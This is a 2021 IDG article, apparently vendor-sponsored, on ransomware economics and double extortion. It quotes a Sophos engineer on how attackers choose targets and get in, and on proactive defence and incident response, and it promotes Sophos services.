Understanding and defeating ransomware is about following the money

Ransomware  >  A coin-operated lock ransoming an encrypted system.
The Lightwriter / Getty Images

Businesses face a wide range of different cybersecurity threats. While denial of service, phishing, credential theft, business email compromise and others are significant, ransomware has evolved to become a massive problem with criminals boosting the danger through a secondary extortion market.

As well as encrypting files and demanding a ransom for the keys to release a business’ information, some ransomware gangs are also stealing data and threatening to release it into the public domain in order to increase the motivation of victims to pay. Ransomware families such as Doppelpaymer, REvil, Clop, DarkSide, Netwalker, Ragnar Locker, and Conti – engage in this practice and ‘leak’ the data on their website – REVil brazenly puts the data up for sale directly from its website.

The Sophos State of Ransomware 2020 report found that almost half (48%) of Australian organisations had experienced a ransomware attack in the previous 12 months with data encrypted in eight in 10 (81%) of attacks that successfully breached an organisation.

The average global cost of addressing the impact of such an attack, including business downtime, lost orders, operational costs, and more, but not including the ransom, was US$730,000. This average cost rose to US$1.4 million, almost twice as much, when organisations paid the ransom.

Aaron Bugal, the Global Solutions Engineer at Sophos, says “Ransomware doesn’t discriminate - every organisation is a target, regardless of size, sector, or geography. And the ransom amounts are not fixed. Attackers vary them based on what they believe the victim can pay.”

The attackers look at this as a business transaction with an ROI. They will weigh up the cost of spending weeks or months to attack a large business with sophisticated defences against an easy win of a few hundred dollars for an hour or two of work.

“These attacks are executed by skilled and motivated criminals with one key goal in mind – money. Cybercrime gangs often use public resources of information like search engines, open-source intelligence tools and previously exposed data to identify targets they believe will be easy to attack and have the capacity to pay,” Mr Bugal explains.

A well-crafted phishing email is sent to a tight group of intended victims in the hope they’ll let the attacker in by downloading a file with malware, providing log in credentials or inadvertently opening some other door that allows the attacker to breach defences.

In some cases, threat actors use previously stolen credentials or exploit vulnerable remote access gateways to gain access to a network. One of the most recent examples of a vulnerability exploited for attack is the Hafnium assault on on-premise Exchange servers. While hacking group Hafnium started the ball rolling, other cybercriminals were quick to follow suit and we saw ransomware such as DearCry being executed using the same vulnerability soon after.    

Once an attacker is inside your network, they will try to remain undetected for as long as possible while they conduct reconnaissance, exfiltrate data and determine how they can maximise their payday. Often, they will use tools that legitimate IT administrators depend on such as Powershell, Windows Management Instrumentation Commandline (WMIC) and Certutil to blend in with normal activity.

The key to protecting your business from a ransomware attack is to have both proactive and reactive defensive measures in place, says Mr Bugal.

“Proactive security with 24/7 monitoring by both automated software and threat hunting experts is key to quickly and effectively identifying, investigating, and mitigating anomalous behaviour. Services such as Sophos Managed Threat Response combine the best tools with the most experienced threat hunters to help identify and neutralise active threats, limit recurrence, and minimise the chance of ransomware taking hold of your business assets.” 

Staff education is also key. Regular user education to help them identify what does not look right and making it easy to report anything from a suspicious email to an application performing unusually is critical.

If an attacker does make it past your defences, all is not lost adds Mr Bugal.

“If you think you are under a ransomware attack, you need to contain and neutralise. Once you have stopped the spread, assess the damage,” says Mr Bugal.

Look at what you have lost, and which endpoints, servers and operating systems were affected. Check that your backups are safe and, if they are intact, make an offline copy immediately. Assess which machines were not affected as they’ll be critical in getting you back on your feet.

Expert assistance in repairing the damage and mitigating the risk of further attacks is also important.

“Services such as Sophos Rapid Response offer specialist incident response to help organisations neutralise an active attack and conduct post incident analysis to access what happened and mitigate against further risk,” says Mr Bugal.

Ransomware is a significant risk for all businesses. For criminals, the equation is simple; where will they get the greatest ROI? Businesses need to be proactive in their defences, be prepared should their defences be breached and have a trusted partner they can call on for help should they suffer an attack.

Copyright © 2021 IDG Communications, Inc.